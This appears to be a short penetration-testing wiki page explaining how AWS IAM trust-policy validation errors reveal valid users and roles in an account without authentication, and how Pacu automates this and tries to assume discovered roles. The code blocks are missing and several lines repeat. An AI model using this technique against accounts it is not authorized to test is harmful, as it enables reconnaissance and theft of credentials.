Unauthenticated IAM User and Role Enumeration
Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.
Last updated
Exploiting an AWS feature of the IAM Role Trust Policy allowing for unauthenticated enumeration of AWS IAM Users and Roles in AWS Accounts.
Last updated
We need to know the AWS Account ID for this technique to work. Refer to Discover AWS Account IDs for methods on how to obtain this.
Rhino Security Labs has a great blog post detailing how this works
Essentially, when updating an IAM Role's Trust Policy, AWS will either allow it or return an error
The error is returned if the ARN of the identity does not exist
First, create an IAM Role and then update its Trust Policy
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid
Principals can be specified in an IAM Role's policy and will provide an error if the principal is invalid
Create an IAM Role Policy with a valid principal
Create the IAM Role
Pacu provides modules that automatically attempt to enumerate valid IAM Users and Roles in an AWS account using this method
Pacu will also attempt to assume the role which will provide credentials for the role
Default wordlists are used unless you specify your own
Principals can be specified in an S3 Bucket's policy and will provide an error if the principal is invalid
Principals can be specified in a Lambda Function's resource policy and will provide an error if the principal is invalid
Create Trust Policy for IAM Role
Create IAM Role